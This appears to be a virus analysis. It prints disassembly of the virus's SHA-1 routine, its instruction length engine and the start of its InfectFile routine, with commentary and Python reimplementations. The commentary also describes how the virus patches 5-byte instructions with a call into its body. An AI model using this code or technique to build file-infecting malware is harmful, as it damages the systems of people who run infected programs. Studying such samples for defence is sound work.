CODE:004030D6 mov eax, [esp+280h+var_4a8]
CODE:004030DD rol [esp+280h+var_2e0], 5
CODE:004030E2 xor eax, [esp+280h+var_4bc]
CODE:004030E9 add ebp, [esp+280h+var_2e0]
CODE:004030ED xor eax, [esp+280h+var_4d4]
CODE:004030F4 mov [esp+280h+var_2e0], ebx
CODE:004030F8 xor eax, [esp+280h+var_4dc]
CODE:004030FF xor [esp+280h+var_2e0], ecx
CODE:00403103 rol eax, 1
CODE:00403105 xor [esp+280h+var_2e0], edx
CODE:00403109 mov [esp+280h+var_4dc], eax
CODE:00403110 add ebp, [esp+280h+var_2e0]
CODE:00403114 ror ebx, 2
CODE:00403117 lea ebp, [ebp+eax-359d3e2ah]
CODE:0040311E mov [esp+280h+var_2e0], ebp
CODE:00403122 mov eax, [esp+280h+var_4a4]
CODE:00403129 rol [esp+280h+var_2e0], 5
CODE:0040312E xor eax, [esp+280h+var_4b8]
CODE:00403135 add edx, [esp+280h+var_2e0]
CODE:00403139 xor eax, [esp+280h+var_4d0]
CODE:00403140 mov [esp+280h+var_2e0], edi
CODE:00403144 xor eax, [esp+280h+var_4d8]
CODE:0040314B xor [esp+280h+var_2e0], ebx
CODE:0040314F rol eax, 1
CODE:00403151 xor [esp+280h+var_2e0], ecx
CODE:00403155 mov [esp+280h+var_4d8], eax
CODE:0040315C add edx, [esp+280h+var_2e0]
CODE:00403160 ror edi, 2
CODE:00403163 lea edx, [edx+eax-359d3e2ah]
CODE:0040316A mov [esp+280h+var_2e0], edx
CODE:0040316E mov eax, [esp+280h+_temp_buffer]
CODE:00403175 rol [esp+280h+var_2e0], 5
CODE:0040317A xor eax, [esp+280h+var_4b4]
CODE:00403181 add ecx, [esp+280h+var_2e0]
CODE:00403185 xor eax, [esp+280h+var_4cc]
CODE:0040318C mov [esp+280h+var_2e0], ebp
CODE:00403190 xor eax, [esp+280h+var_4d4]
CODE:00403197 xor [esp+280h+var_2e0], edi
CODE:0040319B rol eax, 1
CODE:0040319D xor [esp+280h+var_2e0], ebx
CODE:004031A1 mov [esp+280h+var_4d4], eax
CODE:004031A8 add ecx, [esp+280h+var_2e0]
CODE:004031AC ror ebp, 2
CODE:004031AF lea ecx, [ecx+eax-359d3e2ah]
CODE:004031B6 mov [esp+280h+var_2e0], ecx
CODE:004031BA mov eax, [esp+280h+var_4dc]
CODE:004031C1 rol [esp+280h+var_2e0], 5
CODE:004031C6 xor eax, [esp+280h+var_4b0]
CODE:004031CD add ebx, [esp+280h+var_2e0]
CODE:004031D1 xor eax, [esp+280h+var_4c8]
CODE:004031D8 mov [esp+280h+var_2e0], edx
CODE:004031DC xor eax, [esp+280h+var_4d0]
CODE:004031E3 xor [esp+280h+var_2e0], ebp
CODE:004031E7 rol eax, 1
CODE:004031E9 xor [esp+280h+var_2e0], edi
CODE:004031ED mov [esp+280h+var_4d0], eax
CODE:004031F4 add ebx, [esp+280h+var_2e0]
CODE:004031F8 ror edx, 2
CODE:004031FB lea ebx, [ebx+eax-359d3e2ah]
CODE:00403202 mov [esp+280h+var_2e0], ebx
CODE:00403206 mov eax, [esp+280h+var_4d8]
CODE:0040320D rol [esp+280h+var_2e0], 5
CODE:00403212 xor eax, [esp+280h+var_4ac]
CODE:00403219 add edi, [esp+280h+var_2e0]
CODE:0040321D xor eax, [esp+280h+var_4c4]
CODE:00403224 mov [esp+280h+var_2e0], ecx
CODE:00403228 xor eax, [esp+280h+var_4cc]
CODE:0040322F xor [esp+280h+var_2e0], edx
CODE:00403233 rol eax, 1
CODE:00403235 xor [esp+280h+var_2e0], ebp
CODE:00403239 mov [esp+280h+var_4cc], eax
CODE:00403240 add edi, [esp+280h+var_2e0]
CODE:00403244 ror ecx, 2
CODE:00403247 lea edi, [edi+eax-359d3e2ah]
CODE:0040324E mov [esp+280h+var_2e0], edi
CODE:00403252 mov eax, [esp+280h+var_4d4]
CODE:00403259 rol [esp+280h+var_2e0], 5
CODE:0040325E xor eax, [esp+280h+var_4a8]
CODE:00403265 add ebp, [esp+280h+var_2e0]
CODE:00403269 xor eax, [esp+280h+var_4c0]
CODE:00403270 mov [esp+280h+var_2e0], ebx
CODE:00403274 xor eax, [esp+280h+var_4c8]
CODE:0040327B xor [esp+280h+var_2e0], ecx
CODE:0040327F rol eax, 1
CODE:00403281 xor [esp+280h+var_2e0], edx
CODE:00403285 mov [esp+280h+var_4c8], eax
CODE:0040328C add ebp, [esp+280h+var_2e0]
CODE:00403290 ror ebx, 2
CODE:00403293 lea ebp, [ebp+eax-359d3e2ah]
CODE:0040329A mov [esp+280h+var_2e0], ebp
CODE:0040329E mov eax, [esp+280h+var_4d0]
CODE:004032A5 rol [esp+280h+var_2e0], 5
CODE:004032AA xor eax, [esp+280h+var_4a4]
CODE:004032B1 add edx, [esp+280h+var_2e0]
CODE:004032B5 xor eax, [esp+280h+var_4bc]
CODE:004032BC mov [esp+280h+var_2e0], edi
CODE:004032C0 xor eax, [esp+280h+var_4c4]
CODE:004032C7 xor [esp+280h+var_2e0], ebx
CODE:004032CB rol eax, 1
CODE:004032CD xor [esp+280h+var_2e0], ecx
CODE:004032D1 mov [esp+280h+var_4c4], eax
CODE:004032D8 add edx, [esp+280h+var_2e0]
CODE:004032DC ror edi, 2
CODE:004032DF lea edx, [edx+eax-359d3e2ah]
CODE:004032E6 mov [esp+280h+var_2e0], edx
CODE:004032EA mov eax, [esp+280h+var_4cc]
CODE:004032F1 rol [esp+280h+var_2e0], 5
CODE:004032F6 xor eax, [esp+280h+_temp_buffer]
CODE:004032FD add ecx, [esp+280h+var_2e0]
CODE:00403301 xor eax, [esp+280h+var_4b8]
CODE:00403308 mov [esp+280h+var_2e0], ebp
CODE:0040330C xor eax, [esp+280h+var_4c0]
CODE:00403313 xor [esp+280h+var_2e0], edi
CODE:00403317 rol eax, 1
CODE:00403319 xor [esp+280h+var_2e0], ebx
CODE:0040331D mov [esp+280h+var_4c0], eax
CODE:00403324 add ecx, [esp+280h+var_2e0]
CODE:00403328 ror ebp, 2
CODE:0040332B lea ecx, [ecx+eax-359d3e2ah]
CODE:00403332 mov [esp+280h+var_2e0], ecx
CODE:00403336 mov eax, [esp+280h+var_4c8]
CODE:0040333D rol [esp+280h+var_2e0], 5
CODE:00403342 xor eax, [esp+280h+var_4dc]
CODE:00403349 add ebx, [esp+280h+var_2e0]
CODE:0040334D xor eax, [esp+280h+var_4b4]
CODE:00403354 mov [esp+280h+var_2e0], edx
CODE:00403358 xor eax, [esp+280h+var_4bc]
CODE:0040335F xor [esp+280h+var_2e0], ebp
CODE:00403363 rol eax, 1
CODE:00403365 xor [esp+280h+var_2e0], edi
CODE:00403369 mov [esp+280h+var_4bc], eax
CODE:00403370 add ebx, [esp+280h+var_2e0]
CODE:00403374 ror edx, 2
CODE:00403377 lea ebx, [ebx+eax-359d3e2ah]
CODE:0040337E mov [esp+280h+var_2e0], ebx
CODE:00403382 mov eax, [esp+280h+var_4c4]
CODE:00403389 rol [esp+280h+var_2e0], 5
CODE:0040338E xor eax, [esp+280h+var_4d8]
CODE:00403395 add edi, [esp+280h+var_2e0]
CODE:00403399 xor eax, [esp+280h+var_4b0]
CODE:004033A0 mov [esp+280h+var_2e0], ecx
CODE:004033A4 xor eax, [esp+280h+var_4b8]
CODE:004033AB xor [esp+280h+var_2e0], edx
CODE:004033AF rol eax, 1
CODE:004033B1 xor [esp+280h+var_2e0], ebp
CODE:004033B5 mov [esp+280h+var_4b8], eax
CODE:004033BC add edi, [esp+280h+var_2e0]
CODE:004033C0 ror ecx, 2
CODE:004033C3 lea edi, [edi+eax-359d3e2ah]
CODE:004033CA mov [esp+280h+var_2e0], edi
CODE:004033CE mov eax, [esp+280h+var_4c0]
CODE:004033D5 rol [esp+280h+var_2e0], 5
CODE:004033DA xor eax, [esp+280h+var_4d4]
CODE:004033E1 add ebp, [esp+280h+var_2e0]
CODE:004033E5 xor eax, [esp+280h+var_4ac]
CODE:004033EC mov [esp+280h+var_2e0], ebx
CODE:004033F0 xor eax, [esp+280h+var_4b4]
CODE:004033F7 xor [esp+280h+var_2e0], ecx
CODE:004033FB rol eax, 1
CODE:004033FD xor [esp+280h+var_2e0], edx
CODE:00403401 mov [esp+280h+var_4b4], eax
CODE:00403408 add ebp, [esp+280h+var_2e0]
CODE:0040340C ror ebx, 2
CODE:0040340F lea ebp, [ebp+eax-359d3e2ah]
CODE:00403416 mov [esp+280h+var_2e0], ebp
CODE:0040341A mov eax, [esp+280h+var_4bc]
CODE:00403421 rol [esp+280h+var_2e0], 5
CODE:00403426 xor eax, [esp+280h+var_4d0]
CODE:0040342D add edx, [esp+280h+var_2e0]
CODE:00403431 xor eax, [esp+280h+var_4a8]
CODE:00403438 mov [esp+280h+var_2e0], edi
CODE:0040343C xor eax, [esp+280h+var_4b0]
CODE:00403443 xor [esp+280h+var_2e0], ebx
CODE:00403447 rol eax, 1
CODE:00403449 xor [esp+280h+var_2e0], ecx
CODE:0040344D mov [esp+280h+var_4b0], eax
CODE:00403454 add edx, [esp+280h+var_2e0]
CODE:00403458 ror edi, 2
CODE:0040345B lea edx, [edx+eax-359d3e2ah]
CODE:00403462 mov [esp+280h+var_2e0], edx
CODE:00403466 mov eax, [esp+280h+var_4b8]
CODE:0040346D rol [esp+280h+var_2e0], 5
CODE:00403472 xor eax, [esp+280h+var_4cc]
CODE:00403479 add ecx, [esp+280h+var_2e0]
CODE:0040347D xor eax, [esp+280h+var_4a4]
CODE:00403484 mov [esp+280h+var_2e0], ebp
CODE:00403488 xor eax, [esp+280h+var_4ac]
CODE:0040348F xor [esp+280h+var_2e0], edi
CODE:00403493 rol eax, 1
CODE:00403495 xor [esp+280h+var_2e0], ebx
CODE:00403499 mov [esp+280h+var_4ac], eax
CODE:004034A0 add ecx, [esp+280h+var_2e0]
CODE:004034A4 ror ebp, 2
CODE:004034A7 lea ecx, [ecx+eax-359d3e2ah]
CODE:004034AE mov [esp+280h+var_2e0], ecx
CODE:004034B2 mov eax, [esp+280h+var_4b4]
CODE:004034B9 rol [esp+280h+var_2e0], 5
CODE:004034BE xor eax, [esp+280h+var_4c8]
CODE:004034C5 add ebx, [esp+280h+var_2e0]
CODE:004034C9 xor eax, [esp+280h+_temp_buffer]
CODE:004034D0 mov [esp+280h+var_2e0], edx
CODE:004034D4 xor eax, [esp+280h+var_4a8]
CODE:004034DB xor [esp+280h+var_2e0], ebp
CODE:004034DF rol eax, 1
CODE:004034E1 xor [esp+280h+var_2e0], edi
CODE:004034E5 mov [esp+280h+var_4a8], eax
CODE:004034EC add ebx, [esp+280h+var_2e0]
CODE:004034F0 ror edx, 2
CODE:004034F3 lea ebx, [ebx+eax-359d3e2ah]
CODE:004034FA mov [esp+280h+var_2e0], ebx
CODE:004034FE mov eax, [esp+280h+var_4b0]
CODE:00403505 rol [esp+280h+var_2e0], 5
CODE:0040350A xor eax, [esp+280h+var_4c4]
CODE:00403511 add edi, [esp+280h+var_2e0]
CODE:00403515 xor eax, [esp+280h+var_4dc]
CODE:0040351C mov [esp+280h+var_2e0], ecx
CODE:00403520 xor eax, [esp+280h+var_4a4]
CODE:00403527 xor [esp+280h+var_2e0], edx
CODE:0040352B rol eax, 1
CODE:0040352D xor [esp+280h+var_2e0], ebp
CODE:00403531 mov [esp+280h+var_4a4], eax
CODE:00403538 add edi, [esp+280h+var_2e0]
CODE:0040353C ror ecx, 2
CODE:0040353F lea edi, [edi+eax-359d3e2ah]
CODE:00403546 add [esp+280h+var_2dc], edi
CODE:0040354A add [esp+280h+var_2d8], ebx
CODE:0040354E add [esp+280h+var_2d4], ecx
CODE:00403552 add [esp+280h+var_2d0], edx
CODE:00403556 add [esp+280h+var_2cc], ebp
CODE:0040355A sub [esp+280h+_count], 40h
CODE:0040355F jmp SHA1_Loop

CODE:00403564 SHA1_LIPOF:
CODE:00403564 cmp [esp+280h+_flag], 0
CODE:00403569 jz short SHA1_Finishing
CODE:0040356B push 40h
CODE:0040356D pop edx
CODE:0040356E mov ecx, [esp+280h+_count]
CODE:00403572 mov [esp+280h+_count], edx
CODE:00403576 mov eax, ecx
CODE:00403578 lea edi, [esp+280h+_temp_buffer]
CODE:0040357F test eax, eax
CODE:00403581 jz short only_null
CODE:00403583 rep movsb

CODE:00403585 only_null:
CODE:00403585 mov ecx, eax
CODE:00403587 mov al, 80h
CODE:00403589 stosb
CODE:0040358A sub ecx, 37h
CODE:0040358D neg ecx
CODE:0040358F jz short save_size_in_pad
CODE:00403591 jns short zero_mem
CODE:00403593 add [esp+280h+_count], edx
CODE:00403597 add ecx, edx

CODE:00403599 zero_mem:
CODE:00403599 xor al, al
CODE:0040359B rep stosb

CODE:0040359D save_size_in_pad:
CODE:0040359D xor edx, edx
CODE:0040359F mov eax, [esp+280h+_size]
CODE:004035A3 push 8
CODE:004035A5 pop esi
CODE:004035A6 mul esi
CODE:004035A8 bswap eax
CODE:004035AA bswap edx
CODE:004035AC mov [edi], edx
CODE:004035AE mov [edi+4], eax
CODE:004035B1 lea esi, [esp+280h+_temp_buffer]
CODE:004035B8 mov [esp+280h+_flag], 0
CODE:004035C0 jmp SHA1_Loop

CODE:004035C5 SHA1_Finishing:
CODE:004035C5 mov edi, [esp+280h+arg_0]
CODE:004035CC lea esi, [esp+280h+var_2dc]
CODE:004035D0 push 5
CODE:004035D2 pop ecx

CODE:004035D3 SHA1_CopyResult:
CODE:004035D3 mov eax, [esi+ecx*4-4]
CODE:004035D7 bswap eax
CODE:004035D9 mov [edi+ecx*4-4], eax
CODE:004035DD dec ecx
CODE:004035DE jnz short SHA1_CopyResult
CODE:004035E0 push 38h
CODE:004035E2 pop ecx
CODE:004035E3 xor eax, eax
CODE:004035E5 lea edi, [esp+280h+_temp_buffer]
CODE:004035EC rep stosd
CODE:004035EE add esp, 260h
CODE:004035F4 popa
CODE:004035F5 retn 0Ch
CODE:004035F5 SHA1 endp
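As an added illustration (not code from the virus or from the original analysis), the following Python reimplements the SHA1 routine listed above, with the padding written the way SHA1_LIPOF fills _temp_buffer: 80h, zero fill, then the bit length computed by mul esi and stored big-endian by the two bswaps, with a second block queued when the 80h byte lands past offset 55 (the negative result of sub ecx, 37h / neg ecx, answered by add [_count], edx). The constants match the listing (-70e44324h is 8F1BBCDCh, -359d3e2ah is CA62C1D6h); the function names and the hashlib comparison are mine.

```python
import hashlib
import struct

MASK = 0xFFFFFFFF
H0 = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)
# Round constants. The listing adds them as negative LEA displacements:
# lea edi, [edi+eax-70e44324h] is +8F1BBCDCh, lea ..., -359d3e2ah is +CA62C1D6h.
K = (0x5A827999, 0x6ED9EBA1, 0x8F1BBCDC, 0xCA62C1D6)

def rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK

def sha1_pad(data):
    """Pad the way SHA1_LIPOF fills _temp_buffer: 80h, zeros up to byte 55 of the block,
    then the bit length (size * 8 from 'mul esi', stored big-endian by the two bswaps)."""
    count = len(data) % 64
    fill = 55 - count                       # 'sub ecx, 37h' / 'neg ecx'
    if fill < 0:                            # 80h landed past byte 55: the length needs a second block
        fill += 64                          # 'add ecx, edx' (edx = 40h), plus 'add [_count], edx'
    return data + b'\x80' + b'\x00' * fill + struct.pack('>Q', len(data) * 8)

def sha1_compress(state, block):
    """One 64-byte block; the unrolled rounds in the listing are this loop with
    'ror reg, 2' standing in for rol 30 and the xor/majority expressions spelled out."""
    w = list(struct.unpack('>16L', block))
    for t in range(16, 80):                 # the 'xor, xor, xor, rol 1' schedule on the stack words
        w.append(rol(w[t - 3] ^ w[t - 8] ^ w[t - 14] ^ w[t - 16], 1))
    a, b, c, d, e = state
    for t in range(80):
        if t < 20:
            f = (b & c) | (~b & d)
        elif t < 40 or t >= 60:
            f = b ^ c ^ d
        else:
            f = (b & c) | (b & d) | (c & d)
        a, b, c, d, e = (rol(a, 5) + f + e + K[t // 20] + w[t]) & MASK, a, rol(b, 30), c, d
    return tuple((s + v) & MASK for s, v in zip(state, (a, b, c, d, e)))

def sha1(data):
    """Digest as the routine returns it: the five state words bswapped into the 20-byte buffer."""
    state = H0
    padded = sha1_pad(data)
    for off in range(0, len(padded), 64):
        state = sha1_compress(state, padded[off:off + 64])
    return struct.pack('>5L', *state)

def matches_hashlib(data):
    """True when this implementation agrees with the standard library on data."""
    return sha1(data) == hashlib.sha1(data).digest()
```

Inputs of 55, 56, 63 and 64 bytes exercise the one-block/two-block boundary; a port of this routine that gets the add [_count], edx branch wrong still agrees with a reference SHA-1 on every other length, so those are the lengths to check.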

The SHA1 routine listed above hashes data for the virus. It is a plain SHA-1 implementation: the lea displacements -70e44324h and -359d3e2ah are the round constants 8F1BBCDCh and CA62C1D6h written as negative numbers, and the bswap applied to each state word at SHA1_CopyResult produces the big-endian digest. The function takes three stack parameters, removed by retn 0Ch: the address of the data to be hashed, the number of bytes to hash, and a pointer to the 20-byte buffer that receives the message digest. At SHA1_LIPOF the tail of the data is padded in _temp_buffer with 80h, zeros and the bit length (the size multiplied by 8, stored as a big-endian 64-bit value); when fewer than 8 bytes of the block remain after the 80h (sub ecx, 37h followed by neg ecx goes negative), 40h is added to _count so that a second block is processed.

CODE:004035F8 ILE proc near
CODE:004035F8 push esi
CODE:004035F9 push edi
CODE:004035FA cld
CODE:004035FB call GetPrefixes
CODE:00403600 call FindOpcode
CODE:00403605 jb short @@Return
CODE:00403607 push ebx
CODE:00403608 xchg esi, edi
CODE:0040360A movzx ecx, bl
CODE:0040360D and cl, 3
CODE:00403610 add esi, ecx
CODE:00403612 cmp cl, 1
CODE:00403615 jnz short @@NoTESTCheck
CODE:00403617 cmp al, 0F6h
CODE:00403619 jz short @@CheckForTEST
CODE:0040361B cmp al, 0F7h
CODE:0040361D jnz short @@NoTESTCheck

CODE:0040361F @@CheckForTEST:
CODE:0040361F push ecx
CODE:00403620 mov cl, [esi]
CODE:00403622 and cl, 38h
CODE:00403625 pop ecx
CODE:00403626 jnz short @@NoTESTCheck
CODE:00403628 or bl, 24h
CODE:0040362B and bl, 3Fh
CODE:0040362E cmp al, 0F6h
CODE:00403630 jz short @@NoTESTCheck
CODE:00403632 or bl, 94h
CODE:00403635 and bl, 0DFh

CODE:00403638 @@NoTESTCheck:
CODE:00403638 test bl, 4
CODE:0040363B jz short @@NoModRM
CODE:0040363D push eax
CODE:0040363E call DecodeModRM
CODE:00403643 pop eax

CODE:00403644 @@NoModRM:
CODE:00403644 test bh, 2
CODE:00403647 jz short @@NoOperandOrImmed
CODE:00403649 test bl, 10h
CODE:0040364C jz short @@NoOperandOrImmed
CODE:0040364E shr bl, 5
CODE:00403651 add cl, bl
CODE:00403653 sub cl, 2
CODE:00403656 add ecx, edx
CODE:00403658 pop ebx
CODE:00403659 jmp short @@Return

CODE:0040365B @@NoOperandOrImmed:
CODE:0040365B shr bl, 5
CODE:0040365E add cl, bl
CODE:00403660 add ecx, edx
CODE:00403662 pop ebx

CODE:00403663 @@Return:
CODE:00403663 pop edi
CODE:00403664 pop esi
CODE:00403665 retn
CODE:00403665 ILE endp

The previous code block is the main function of the Instruction Length Engine (ILE). It expects a pointer to the instruction in ESI and returns the instruction length in ECX, or returns with the carry flag set (inherited from FindOpcode) when the opcode is not in its tables. The length is assembled from what the helpers report: the prefix count in EDX, the opcode length in the low two bits of BL, the ModR/M, SIB and displacement bytes added by DecodeModRM when bit 2 of BL is set, and the immediate size in the top three bits of BL, reduced by two when bit 4 of BL is set and a 66h operand-size prefix was seen (bit 1 of BH). TEST r/m, imm (F6 /0 and F7 /0) is handled specially at @@CheckForTEST because the table entry for F6/F7 carries no immediate: the flag byte is rewritten to an 8-bit immediate for F6 and a 32-bit, operand-size-dependent immediate for F7.

CODE:00403666 GetPrefixes proc near
CODE:00403666 xor ebx, ebx
CODE:00403668 xor edx, edx
CODE:0040366A lea edi, PrefixBuffer
CODE:00403670 xchg esi, edi
CODE:00403672 push 0Bh
CODE:00403674 pop ecx

CODE:00403675 @@NextPrefix:
CODE:00403675 lodsb
CODE:00403676 cmp [edi], al
CODE:00403678 jnz short @@NotEqual
CODE:0040367A push 0Ch
CODE:0040367C pop ecx
CODE:0040367D inc edx
CODE:0040367E inc edi
CODE:0040367F lea esi, PrefixBuffer
CODE:00403685 cmp al, 67h
CODE:00403687 jnz short @@NoAddress
CODE:00403689 or bh, 1

CODE:0040368C @@NoAddress:
CODE:0040368C cmp al, 66h
CODE:0040368E jnz short @@NoOperand
CODE:00403690 or bh, 2

CODE:00403693 @@NoOperand:
CODE:00403693 cmp al, 64h
CODE:00403695 jnz short @@NotEqual
CODE:00403697 or bh, 4

CODE:0040369A @@NotEqual:
CODE:0040369A loop @@NextPrefix
CODE:0040369C retn
CODE:0040369C GetPrefixes endp

The previous code block counts the instruction prefixes and steps past them. It expects a pointer to the instruction in ESI, compares each instruction byte against the 11-entry PrefixBuffer (restarting the scan after every hit), and returns the prefix count in EDX and, because of the initial xchg, the pointer to the first opcode byte in EDI. It also records in BH which size-changing prefixes it saw: bit 0 for 67h (address size), bit 1 for 66h (operand size) and bit 2 for 64h (FS segment override).

CODE:0040369D FindOpcode proc near
CODE:0040369D var_1 = byte ptr -1
CODE:0040369D push ebx
CODE:0040369E push edx
CODE:0040369F lea esi, OpcodeTable

CODE:004036A5 @@NextGroup:
CODE:004036A5 lodsw
CODE:004036A7 movzx ecx, al
CODE:004036AA mov bl, ah
CODE:004036AC stc
CODE:004036AD jecxz short @@Failed
CODE:004036AF movzx edx, bl
CODE:004036B2 and dl, 3
CODE:004036B5 dec edx
CODE:004036B6 jz short @@NextGroupEntry1
CODE:004036B8 dec edx
CODE:004036B9 jz short @@NextGroupEntry2
CODE:004036BB mov edx, [edi]
CODE:004036BD shl edx, 8

CODE:004036C0 @@NextGroupEntry3:
CODE:004036C0 lodsd
CODE:004036C1 dec esi
CODE:004036C2 shl eax, 8
CODE:004036C5 cmp eax, edx
CODE:004036C7 jz short @@Return
CODE:004036C9 loop @@NextGroupEntry3
CODE:004036CB jmp short @@NextGroup

CODE:004036CD @@NextGroupEntry2:
CODE:004036CD movzx edx, word ptr [edi]
CODE:004036D0 test bl, 1000b
CODE:004036D3 jz short @@NoRegIncoded2
CODE:004036D5 and dh, 11111000b

CODE:004036D8 @@NoRegIncoded2:
CODE:004036D8 lodsw
CODE:004036DA cmp ax, dx
CODE:004036DD jz short @@Return
CODE:004036DF loop @@NoRegIncoded2
CODE:004036E1 jmp short @@NextGroup

CODE:004036E3 @@NextGroupEntry1:
CODE:004036E3 mov dl, [edi]
CODE:004036E5 test bl, 8
CODE:004036E8 jz short @@NoRegIncoded1
CODE:004036EA and dl, 0F8h

CODE:004036ED @@NoRegIncoded1:
CODE:004036ED lodsb
CODE:004036EE cmp al, dl
CODE:004036F0 jz short @@Return
CODE:004036F2 loop @@NoRegIncoded1
CODE:004036F4 jmp short @@NextGroup

CODE:004036F6 @@Return:
CODE:004036F6 clc

CODE:004036F7 @@Failed:
CODE:004036F7 mov [esp+5+var_1], bl
CODE:004036FB pop edx
CODE:004036FC pop ebx
CODE:004036FD retn
CODE:004036FD FindOpcode endp

The previous code block looks an opcode up in the tables. It expects a pointer to the opcode (after any prefixes) in EDI. OpcodeTable is a sequence of groups, each headed by a word: the low byte is the number of entries in the group (zero terminates the table and the function returns with the carry flag set), the high byte is the flag byte shared by every opcode in the group. Bits 0-1 of that byte select 1-, 2- or 3-byte opcodes, bit 3 marks opcodes whose low three bits encode a register (they are masked with 0F8h before the compare), and the whole byte is handed back to ILE in BL by writing it over the saved EBX on the stack (mov [esp+5+var_1], bl).

CODE:004036FE DecodeModRM proc near
CODE:004036FE test bh, 1
CODE:00403701 jnz short @@DecodeModRM16
CODE:00403703 inc ecx
CODE:00403704 lodsb
CODE:00403705 mov ah, al
CODE:00403707 and ah, 0C0h
CODE:0040370A jz short @@FindSIB
CODE:0040370C cmp ah, 0C0h
CODE:0040370F jz short @@Done1
CODE:00403711 inc ecx
CODE:00403712 cmp ah, 40h
CODE:00403715 jz short @@FindSIB
CODE:00403717 test bh, 1
CODE:0040371A jnz short @@AddTwo1
CODE:0040371C inc ecx
CODE:0040371D inc ecx

CODE:0040371E @@AddTwo1:
CODE:0040371E inc ecx

CODE:0040371F @@FindSIB:
CODE:0040371F mov ah, al
CODE:00403721 and ah, 11000111b
CODE:00403724 cmp ah, 101b
CODE:00403727 jnz short @@NoHardcoded
CODE:00403729 add ecx, 4

CODE:0040372C @@NoHardcoded:
CODE:0040372C mov ah, al
CODE:0040372E and ah, 7
CODE:00403731 cmp ah, 4
CODE:00403734 jnz short @@Done1
CODE:00403736 inc ecx
CODE:00403737 mov ah, al
CODE:00403739 lodsb
CODE:0040373A and ax, 1100000000000111b
CODE:0040373E cmp ax, 100000000000101b
CODE:00403742 jz short @@AddOneSIB
CODE:00403744 cmp al, 101b
CODE:00403746 jnz short @@Done1
CODE:00403748 add ecx, 11b

CODE:0040374B @@AddOneSIB:
CODE:0040374B inc ecx

CODE:0040374C @@Done1:
CODE:0040374C retn

CODE:0040374D @@DecodeModRM16:
CODE:0040374D inc ecx
CODE:0040374E lodsb
CODE:0040374F mov ah, al
CODE:00403751 and ah, 0C0h
CODE:00403754 jz short @@CheckDisp16
CODE:00403756 cmp ah, 0C0h
CODE:00403759 jz short @@Done2
CODE:0040375B cmp ah, 40h
CODE:0040375E jz short @@AddOne

CODE:00403760 @@AddTwo2:
CODE:00403760 inc ecx

CODE:00403761 @@AddOne:
CODE:00403761 inc ecx

CODE:00403762 @@Done2:
CODE:00403762 retn

CODE:00403763 @@CheckDisp16:
CODE:00403763 and al, 7
CODE:00403765 cmp al, 6
CODE:00403767 jz short @@AddTwo2
CODE:00403769 retn
CODE:00403769 DecodeModRM endp

The previous code block decodes the ModR/M byte, in its 32-bit form or, when bit 0 of BH records a 67h prefix, in its 16-bit form, and adds the size of the ModR/M byte, any SIB byte and the displacement to the running length. It expects ESI to point at the ModR/M byte and the length accumulated so far in ECX.

CODE:0040376A InfectFile proc near
CODE:0040376A var_46c = dword ptr -46Ch
CODE:0040376A pusha

CODE:0040376B @@InfectIsBusy:
CODE:0040376B cmp InfectState, 0
CODE:00403772 jnz short @@InfectIsBusy
CODE:00403774 or InfectState, 0FFFFFFFFh
CODE:0040377B lea ebx, sub_403ccc
CODE:00403781 mov [ebp+0f4h], ebx
CODE:00403787 lea ebx, @@NotInfectable
CODE:0040378D mov [ebp+0f8h], ebx
CODE:00403793 mov [ebp+0fch], esp
CODE:00403799 lea ebx, [ebp+0f0h]
CODE:0040379F push ebx
CODE:004037A0 xor ebx, ebx
CODE:004037A2 push dword ptr fs:[ebx]
CODE:004037A5 pop dword ptr [ebp+0f0h]
CODE:004037AB pop dword ptr fs:[ebx]
CODE:004037AE lea esi, [ebp+168h]
CODE:004037B4 call Uppercase
CODE:004037B9 mov edi, esi
CODE:004037BB mov ebx, esi

CODE:004037BD @@GetFileNameAndEndOfFileName:
CODE:004037BD lodsb
CODE:004037BE test al, al
CODE:004037C0 jz short @@GotFileNameAndEndOfIt
CODE:004037C2 cmp al, '\'
CODE:004037C4 jnz short @@GetFileNameAndEndOfFileName
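Added example, not the virus's code and not part of the original analysis: a Python reimplementation of the length engine described above (GetPrefixes, FindOpcode, DecodeModRM, the TEST special case and the 66h immediate shrink), using the same flag-byte layout that FindOpcode hands back in BL. The contents of OpcodeTable and PrefixBuffer are not in the listing, so the opcode table here is a subset I chose and the prefix set is the standard legacy prefixes; both are assumptions. The ModR/M sizing follows the Intel encoding rules. Note that DecodeModRM as listed adds one more byte on the cmp ax, 100000000000101b path (mod=01, SIB base=101) after the disp8 has already been counted, and four more on the cmp al, 101b path when mod=10, so this code and the virus disagree on those two forms; the reader can trace both paths in the listing above. The last two functions show how InfectFile, listed below, uses the lengths: it walks a section linearly, keeps only instructions of at least 5 bytes (cmp ecx, 5), overwrites the chosen spot with E8 rel32 towards the virus body, and stores a 9-byte record of the VA following the call and the 5 original bytes (the movsb/movsd at 2F93h+9*i and the store at [edx-4]).

```python
import struct

# Legacy prefixes. GetPrefixes scans an 11-entry PrefixBuffer (push 0Bh); its
# contents are not in the listing, so this standard set is an assumption.
PREFIXES = {0x26, 0x2E, 0x36, 0x3E, 0x64, 0x65, 0x66, 0x67, 0xF0, 0xF2, 0xF3}

# Flag byte as FindOpcode returns it in BL: bits 0-1 opcode length, bit 2 a ModR/M
# follows, bit 3 register encoded in the low 3 opcode bits, bit 4 the immediate
# shrinks by two under a 66h prefix, bits 5-7 immediate size in bytes.
MODRM, REG, OPSIZE = 0x04, 0x08, 0x10

def imm(n):
    return n << 5

TABLE = {}   # opcode bytes -> flag byte; a subset chosen here, OpcodeTable itself is not listed

def add(flags, *opcodes):
    for op in opcodes:
        key = bytes([0x0F, op]) if (flags & 3) == 2 else bytes([op])
        regs = range(8) if flags & REG else [op & 7]      # 'and dl, 0F8h' entries cover 8 opcodes
        for r in regs:
            TABLE[key[:-1] + bytes([(op & 0xF8) | r])] = flags

add(1, 0x90, 0xC3, 0xC9, 0x60, 0x61, 0x9C, 0x9D, 0xCC, 0xFC, 0xFD)
add(1 | REG, 0x40, 0x48, 0x50, 0x58)                                   # inc/dec/push/pop r32
add(1 | imm(1), 0x04, 0x24, 0x2C, 0x34, 0x3C, 0x6A, 0xA8, 0xCD, 0xEB, *range(0x70, 0x80))
add(1 | imm(1) | REG, 0xB0)                                            # mov r8, imm8
add(1 | imm(4) | OPSIZE, 0x05, 0x25, 0x2D, 0x35, 0x3D, 0x68, 0xA9, 0xE8, 0xE9)
add(1 | imm(4) | OPSIZE | REG, 0xB8)                                   # mov r32, imm32
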